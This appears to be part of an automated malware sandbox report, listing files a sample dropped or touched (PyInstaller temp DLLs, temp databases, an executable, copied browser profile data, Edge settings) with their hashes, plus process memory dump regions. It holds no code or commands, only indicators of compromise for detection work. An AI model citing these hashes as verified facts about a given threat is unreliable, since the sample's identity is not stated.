SHA1 0eaf5de57369e1db7f275a2fffd2d2c9e5af65bf
SHA256 d045a72c3e4d21165e9372f76b44ff116446c1e0c221d9cea3ab0a1134a310e8
SHA512 96dd48df315a7eea280ca3da0965a937a649ee77a82a1049e3d09b234439f7d927d7fb749073d7af1b23dadb643978b70dcdadc6c503fe850b512b0c9c1c78dd

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-libraryloader-l1-1-0.dll

MD5 8dfc224c610dd47c6ec95e80068b40c5
SHA1 178356b790759dc9908835e567edfb67420fbaac
SHA256 7b8c7e09030df8cdc899b9162452105f8baeb03ca847e552a57f7c81197762f2
SHA512 fe5be81bfce4a0442dd1901721f36b1e2efcdcee1fdd31d7612ad5676e6c5ae5e23e9a96b2789cb42b7b26e813347f0c02614937c561016f1563f0887e69bbee

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-interlocked-l1-1-0.dll

MD5 4f631924e3f102301dac36b514be7666
SHA1 b3740a0acdaf3fba60505a135b903e88acb48279
SHA256 e2406077621dce39984da779f4d436c534a31c5e863db1f65de5939d962157af
SHA512 56f9fb629675525cbe84a29d44105b9587a9359663085b62f3fbe3eea66451da829b1b6f888606bc79754b6b814ca4a1b215f04f301efe4db0d969187d6f76f1

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-heap-l1-1-0.dll

MD5 6168023bdb7a9ddc69042beecadbe811
SHA1 54ee35abae5173f7dc6dafc143ae329e79ec4b70
SHA256 4ea8399debe9d3ae00559d82bc99e4e26f310934d3fd1d1f61177342cf526062
SHA512 f1016797f42403bb204d4b15d75d25091c5a0ab8389061420e1e126d2214190a08f02e2862a2ae564770397e677b5bcdd2779ab948e6a3e639aa77b94d0b3f6c

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-handle-l1-1-0.dll

MD5 d584c1e0f0a0b568fce0efd728255515
SHA1 2e5ce6d4655c391f2b2f24fc207fdf0e6cd0cc2a
SHA256 3de40a35254e3e0e0c6db162155d5e79768a6664b33466bf603516f3743efb18
SHA512 c7d1489bf81e552c022493bb5a3cd95ccc81dbedaaa8fdc0048cacbd087913f90b366eeb4bf72bf4a56923541d978b80d7691d96dbbc845625f102c271072c42

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-file-l2-1-0.dll

MD5 bfffa7117fd9b1622c66d949bac3f1d7
SHA1 402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2
SHA256 1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e
SHA512 b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-file-l1-2-0.dll

MD5 bcb8b9f6606d4094270b6d9b2ed92139
SHA1 bd55e985db649eadcb444857beed397362a2ba7b
SHA256 fa18d63a117153e2ace5400ed89b0806e96f0627d9db935906be9294a3038118
SHA512 869b2b38fd528b033b3ec17a4144d818e42242b83d7be48e2e6da6992111758b302f48f52e0dd76becb526a90a2b040ce143c6d4f0e009a513017f06b9a8f2b9

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-file-l1-1-0.dll

MD5 ea00855213f278d9804105e5045e2882
SHA1 07c6141e993b21c4aa27a6c2048ba0cff4a75793
SHA256 f2f74a801f05ab014d514f0f1d0b3da50396e6506196d8beccc484cd969621a6
SHA512 b23b78b7bd4138bb213b9a33120854249308bb2cf0d136676174c3d61852a0ac362271a24955939f04813cc228cd75b3e62210382a33444165c6e20b5e0a7f24

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-errorhandling-l1-1-0.dll

MD5 f1534c43c775d2cceb86f03df4a5657d
SHA1 9ed81e2ad243965e1090523b0c915e1d1d34b9e1
SHA256 6e6bfdc656f0cf22fabba1a25a42b46120b1833d846f2008952fe39fe4e57ab2
SHA512 62919d33c7225b7b7f97faf4a59791f417037704eb970cb1cb8c50610e6b2e86052480cdba771e4fad9d06454c955f83ddb4aea2a057725385460617b48f86a7

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-debug-l1-1-0.dll

MD5 71f1d24c7659171eafef4774e5623113
SHA1 8712556b19ed9f80b9d4b6687decfeb671ad3bfe
SHA256 c45034620a5bb4a16e7dd0aff235cc695a5516a4194f4fec608b89eabd63eeef
SHA512 0a14c03365adb96a0ad539f8e8d8333c042668046cea63c0d11c75be0a228646ea5b3fbd6719c29580b8baaeb7a28dc027af3de10082c07e089cdda43d5c467a

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-datetime-l1-1-0.dll

MD5 c5e3e5df803c9a6d906f3859355298e1
SHA1 0ecd85619ee5ce0a47ff840652a7c7ef33e73cf4
SHA256 956773a969a6213f4685c21702b9ed5bd984e063cf8188acbb6d55b1d6ccbd4e
SHA512 deedef8eaac9089f0004b6814862371b276fbcc8df45ba7f87324b2354710050d22382c601ef8b4e2c5a26c8318203e589aa4caf05eb2e80e9e8c87fd863dfc9

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-console-l1-1-0.dll

MD5 40ba4a99bf4911a3bca41f5e3412291f
SHA1 c9a0e81eb698a419169d462bcd04d96eaa21d278
SHA256 af0e561bb3b2a13aa5ca9dfc9bc53c852bad85075261af6ef6825e19e71483a6
SHA512 f11b98ff588c2e8a88fdd61d267aa46dc5240d8e6e2bfeea174231eda3affc90b991ff9aae80f7cea412afc54092de5857159569496d47026f8833757c455c23

memory/5508-885-0x00000000018F0000-0x00000000018FA000-memory.dmp

memory/5508-886-0x00000000031F0000-0x0000000003200000-memory.dmp

memory/5508-887-0x0000000005800000-0x0000000005892000-memory.dmp

memory/5508-888-0x0000000005E50000-0x00000000063F4000-memory.dmp

memory/4440-898-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/4440-899-0x0000015CD56B0000-0x0000015CD56C0000-memory.dmp

memory/4440-900-0x0000015CD56B0000-0x0000015CD56C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zazay2u0.n3k.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4440-901-0x0000015CD5880000-0x0000015CD58A2000-memory.dmp

memory/4440-902-0x0000015CD56B0000-0x0000015CD56C0000-memory.dmp

memory/4440-905-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/4704-911-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/4704-916-0x000001DCEC280000-0x000001DCEC290000-memory.dmp

memory/4704-917-0x000001DCEC280000-0x000001DCEC290000-memory.dmp

memory/4704-918-0x000001DCEC280000-0x000001DCEC290000-memory.dmp

memory/4704-921-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5420-922-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5508-923-0x00000000744B0000-0x0000000074C60000-memory.dmp

memory/6088-930-0x000001E6B1860000-0x000001E6B1870000-memory.dmp

memory/6088-924-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/6088-935-0x000001E6B1860000-0x000001E6B1870000-memory.dmp

memory/6088-936-0x000001E6B1860000-0x000001E6B1870000-memory.dmp

memory/6088-938-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5508-941-0x00000000031F0000-0x0000000003200000-memory.dmp

memory/5452-942-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5452-943-0x0000018BE86A0000-0x0000018BE86B0000-memory.dmp

C:\Users\Admin\AppData\Local\Tempcsowjmysgs.db

MD5 37192e993c137317c011d5a34ffce7de
SHA1 a8931c7e3bbcb10897a315a85e74f677de3d3f09
SHA256 8b2ec2b5cf867a930aa00d3cf5f13c2dcbf3e706de7556c8b950e7fba9762f03
SHA512 8a7f6968d86724eb0c95d3739776e8960b453ffefd90f79711ad73f3168943015ef8e5ba2b010edac9e01f161c61f25c09df39914d845c2aa45dbdd5a4eb35f1

memory/5452-978-0x0000018BE86A0000-0x0000018BE86B0000-memory.dmp

C:\Users\Admin\AppData\Local\Tempcsccfgfudt.db

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

memory/5452-990-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5964-996-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5476-1019-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5964-1020-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5988-1021-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/6052-1066-0x00000000744B0000-0x0000000074C60000-memory.dmp

memory/5508-1076-0x000000000B450000-0x000000000C050000-memory.dmp

memory/5476-1077-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/6052-1074-0x00000000056A0000-0x00000000056B0000-memory.dmp

memory/5988-1128-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/6052-1130-0x00000000744B0000-0x0000000074C60000-memory.dmp

C:\Users\Admin\AppData\Local\Tempcstibhfkeo.db

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Tempcswqljgecu.db

MD5 90a1d4b55edf36fa8b4cc6974ed7d4c4
SHA1 aba1b8d0e05421e7df5982899f626211c3c4b5c1
SHA256 7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c
SHA512 ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

C:\Users\Admin\AppData\Local\Tempcswtswqnen.db

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Tempcscqggrzfo.db

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

memory/1388-1177-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/1388-1178-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/1388-1179-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/1388-1183-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/1388-1184-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/1388-1186-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/1388-1187-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/1388-1185-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/1388-1188-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/1388-1189-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/5508-1192-0x00000000135C0000-0x0000000014262000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe

MD5 e898826598a138f86f2aa80c0830707a
SHA1 1e912a5671f7786cc077f83146a0484e5a78729c
SHA256 df443ccf551470b3f9f7d92faf51b3b85ae206dd08da3b6390ce9a6039b7253a
SHA512 6827068b8580822ded1fb8447bdb038d0e00633f5ef7f480a8cdeaab6928ac23022a0b7a925058e0926ce9b41a6c8c22a5692e074621b2fccdb7edd29a0d4cfb

memory/1388-1204-0x00000236E0EB0000-0x00000236E0EB8000-memory.dmp

memory/1388-1205-0x00000236E0ED0000-0x00000236E0ED1000-memory.dmp

memory/1388-1206-0x00000236E0EB0000-0x00000236E0EB8000-memory.dmp

memory/1388-1208-0x00007FF792460000-0x00007FF792590000-memory.dmp

memory/1388-1209-0x00007FFE81690000-0x00007FFE81E20000-memory.dmp

memory/1388-1210-0x00000236E0EB0000-0x00000236E0EB8000-memory.dmp

memory/5508-1212-0x0000000007C30000-0x0000000007C42000-memory.dmp

memory/3384-1218-0x000000000AF80000-0x000000000AF88000-memory.dmp

memory/3384-1221-0x000000000AF80000-0x000000000AF88000-memory.dmp

memory/3384-1223-0x000000000AF80000-0x000000000AF88000-memory.dmp

memory/1388-1222-0x00000236E0EB0000-0x00000236E0EB8000-memory.dmp

memory/5508-1285-0x0000000009550000-0x00000000095B6000-memory.dmp

memory/5920-1286-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/3384-1287-0x000000000B830000-0x000000000B831000-memory.dmp

memory/5920-1289-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5508-1290-0x0000000007CA0000-0x0000000007CAA000-memory.dmp

memory/5508-1291-0x000000000F0B0000-0x000000000F0BA000-memory.dmp

memory/5508-1292-0x00000000031F0000-0x0000000003200000-memory.dmp

memory/5508-1293-0x0000000009E40000-0x0000000009E4C000-memory.dmp

memory/5508-1294-0x000000000A230000-0x000000000A238000-memory.dmp

C:\Users\Admin\AppData\Roaming\Gongle\aW3BX50QGZ\0z1r4qkh.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite

MD5 d224617fef6bac96c7cb6a429c09fbaf
SHA1 513d06a2f268043f04687b3f982ec456fa730ef4
SHA256 15e962975e09ca1128ec5b679f8bae5455fbabb73c5bb540e18be36b2beb47dc
SHA512 5dd258574c4fd0e46d091e5873b3d5fe155e7b6472e037eb26a89d35b5ae6c0f466950ad9811e197856ce65d44bb99a9670a496c5619623585dc0c36cd39e36b

C:\Users\Admin\AppData\Roaming\Gongle\a9OK40CWTC\LOG

MD5 da5f0fbf6410b3ddd6325047b28c6fed
SHA1 51685bea1aabfaa463e4d2c3dd79a3f7b06de85a
SHA256 a9c8217b4efaee614e92cfe2169145c87b848aecca288a6373dfd89bc0041c5a
SHA512 0f0860a2aed0f3e98bcad42e4ab6e66f07777fa6c9c72782cb3b0a7447df111209958cc6c17fa621f58c22dbb2fd534fdaa8bae43101aaffc6245baf42cb34a4

C:\Users\Admin\AppData\Roaming\Gongle\a9OK40CWTC\LOG.old

MD5 8b3ccac199f8e5728393b65ff1a9f565
SHA1 440696e1751e54b8e62f9c2959aa5ac6639130bb
SHA256 0c53d925ba929b5604618107539e640de869f89509aec4dacd6a1f4d42a77374
SHA512 e42d7310309f49daa9684895115ab651233d13d496e863d2b5e2ae4833003018757ff6b403dfec156195f93b0559789e8d82056cf0cedd6b5a4deed16a7b46d6

C:\Users\Admin\AppData\Roaming\Gongle\a0XBE78TUJ\000003.log

MD5 6267c9131ea90521623bdf69bd63818c
SHA1 13fb245bf06c70fc01fd044c5708e314925c3b4c
SHA256 bb779a837d6cff597b4796c4e341cdbce975874cf96d9db93e36a335b550eb59
SHA512 d0ebb61649cb375966fe0998ad2d283f56fce1e4cfbcc81a35cacbc4eda954219a6fd60198d13ecad51b680caa7015400c4790c2814a4562e4b89579d3fa7cf3

C:\Users\Admin\AppData\Roaming\Gongle\a0XBE78TUJ\LOG

MD5 38c43b6eefd91e77f0e10468cbf42872
SHA1 707f245135ac481749e94050a9ffc4dc82cc79be
SHA256 2e06bb5b782a1a8f7360b47edb0048b57e2c157e021555e932365fd5703cfa26
SHA512 275318ca37bf07f70269bb3f67672520ee3fe37543daa908e9da87ea461691ccac9ab3400f9437fab8fca1117738b639c0157c315a81a284dfd32241e56c6c1a

C:\Users\Admin\AppData\Roaming\Gongle\a0XBE78TUJ\LOG.old

MD5 e2b0ea245c71131290d7d99c59cd243f
SHA1 197accc7c2b93282b10df739d9e2a5b8bfa96e95
SHA256 394bebd835352f3f89f2be4a17135f97ba998d4ec15b409b41d9ca87b5289965
SHA512 27eccfea8cd3a8f77aa1018b54aad2d61fc8f25a20b8088cedc2c45136c26a0ae16ee16cf99d764a7267b301cd60a914e9b5a5348322206af23b847b653a9417

memory/5508-1427-0x000000000A240000-0x000000000A2F2000-memory.dmp

memory/5508-1428-0x000000000A340000-0x000000000A362000-memory.dmp

memory/5508-1429-0x000000000A3F0000-0x000000000A466000-memory.dmp

memory/5508-1430-0x000000000A3B0000-0x000000000A3CE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dd198d756254403b8a240b4a565e0c09

MD5 8166da8f918f2041c840d6363c798090
SHA1 4e9ac5499d32c5b86e54317f6b7efd1cef9e71c0
SHA256 049c6e9809fb1b2614578f8772ee5330d11867a84199cc1c7ab62de49b91efc9
SHA512 2d64b9412782fdd1b60625b5445772c01a7f3afc9be78c49a072b0eb5d17aa9f2495cb3debb1568a60c492f067b9cbd3f0c04b4a770cff7ace666c0c7fdb6cbe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 018a7e675163814400699d3fd4179d2a
SHA1 d52dcbcf86e2e32c6d0f3956188d41197a9057ec
SHA256 b955c566b18a8180012dd01956492828da59f429b3224d2db6ca8ba0e77ffe75
SHA512 94dded9b3c1311a3f3d597d4d312d05b49a86934a3e044f0560c878fc406d244e756ad3c3344ab1b91fcf6f66139bc6cf94af45eb21a668ee436dc832a305971

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 866b183f181b0469a641b0f77560742a
SHA1 1766a7219123bf63a2561beeaf1891d23aedf4a9
SHA256 e0896991d2b91cc5568ee127ad09c7157a0472453d47d0898c4f4ffa851d0a8f
SHA512 dfa03c223c16b7719433a0c3a34578b6ca0d863decd7478a4f9c435d225bbabd6d1ec1f4be0d285d5ebee4ab760eda97c7ed88a6b9c4d88e6390baffce2248ef